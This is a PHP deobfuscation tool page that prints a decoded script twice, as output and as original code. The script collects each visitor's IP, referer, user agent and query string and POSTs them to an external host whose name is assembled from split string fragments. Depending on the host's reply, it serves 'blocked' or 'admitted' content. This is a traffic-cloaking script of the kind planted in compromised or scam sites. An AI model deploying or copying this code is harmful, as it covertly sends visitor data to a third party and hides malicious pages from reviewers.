Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (!function_exists('xjqHtc3e72')) { function xjqHtc3e72() { $x5xIAT = $_SERVER['..

Decoded Output download

<?php 
 if (!function_exists('xjqHtc3e72')) { function xjqHtc3e72() { $x5xIAT = $_SERVER['SERVER_ADDR']; $xpnAz = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xpnAz) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($x5xIAT))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xpnAz)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xpnAz) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($x5xIAT))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xpnAz) && (($_SERVER['HTTP_CLIENT_IP'])!=($x5xIAT))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }} $ip=xjqHtc3e72();  
 if (!function_exists('xu13rEdTPlV')) { function xu13rEdTPlV() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xu13rEdTPlV();  
 if (!function_exists('xN9tZhrsej')) { function xN9tZhrsej() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xN9tZhrsej();  
 if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';}  
 $sourcename = 'c'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y990083'; $dex9 = '.re'; $langua = 'na'; $command = 'st';  
 $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch);  
 if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') { echo '[PHP code without <?php ?> for BLOCKED]'; } else { echo '[PHP code without <?php ?> for ADMITTED]'; } 
 ?>

Did this file decode correctly?

Original Code

<?php
 if (!function_exists('xjqHtc3e72')) { function xjqHtc3e72() { $x5xIAT = $_SERVER['SERVER_ADDR']; $xpnAz = '127.0.0.1'; if ((!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=$xpnAz) && (($_SERVER['HTTP_CF_CONNECTING_IP'])!=($x5xIAT))) {$ip=$_SERVER['HTTP_CF_CONNECTING_IP'];} elseif ((!empty($_SERVER['GEOIP_ADDR'])) && (($_SERVER['GEOIP_ADDR'])!=$xpnAz)) {$ip=$_SERVER['GEOIP_ADDR'];} elseif ((!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=$xpnAz) && (($_SERVER['HTTP_X_FORWARDED_FOR'])!=($x5xIAT))) {$ip=explode(',',$_SERVER['HTTP_X_FORWARDED_FOR'])[0];} elseif ((!empty($_SERVER['HTTP_CLIENT_IP'])) && (($_SERVER['HTTP_CLIENT_IP'])!=$xpnAz) && (($_SERVER['HTTP_CLIENT_IP'])!=($x5xIAT))) {$ip=$_SERVER['HTTP_CLIENT_IP'];} else {$ip=$_SERVER['REMOTE_ADDR'];} return $ip; }} $ip=xjqHtc3e72(); 
 if (!function_exists('xu13rEdTPlV')) { function xu13rEdTPlV() { if(empty($_SERVER['HTTP_REFERER'])) { $_SERVER['HTTP_REFERER'] = getenv('HTTP_REFERER'); } return $_SERVER['HTTP_REFERER']; }} $ref=xu13rEdTPlV(); 
 if (!function_exists('xN9tZhrsej')) { function xN9tZhrsej() { if(empty($_SERVER['HTTP_USER_AGENT'])) { $_SERVER['HTTP_USER_AGENT'] = getenv('HTTP_USER_AGENT'); } return $_SERVER['HTTP_USER_AGENT']; }} $eRf9t9d9 = xN9tZhrsej(); 
 if ($_SERVER['QUERY_STRING']!=''){ $dHerF777hg = ''.urlencode($_SERVER['QUERY_STRING']).''; } else {$dHerF777hg = '';} 
 $sourcename = 'c'; $whatdo = 'find'; $sourceid = ''; $who = 'us'; $fd = 'y990083'; $dex9 = '.re'; $langua = 'na'; $command = 'st'; 
 $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_URL, 'https://'.$whatdo.''.$who.''.$dex9.''.$command.'/'.$who.''.$command.'.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); curl_setopt($ch, CURLOPT_TIMEOUT,333); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, 'fd='.$fd.'&ip='.$ip.'&ref='.$ref.'&ua='.$eRf9t9d9.'&data='.$dHerF777hg.'&sourceid='.$sourceid.'&sourcename='.$sourcename.''); $ifbot = curl_exec($ch); curl_close($ch); 
 if ($ifbot == '') { echo '<h1>CURL ERROR</h1>'; } elseif ($ifbot != '0') { echo '[PHP code without <?php ?> for BLOCKED]'; } else { echo '[PHP code without <?php ?> for ADMITTED]'; }
 ?>

Function Calls

None

Variables

None

Stats

MD5 94525cabf2d946099988ddf0418e5f8a
Eval Count 0
Decode Time 51 ms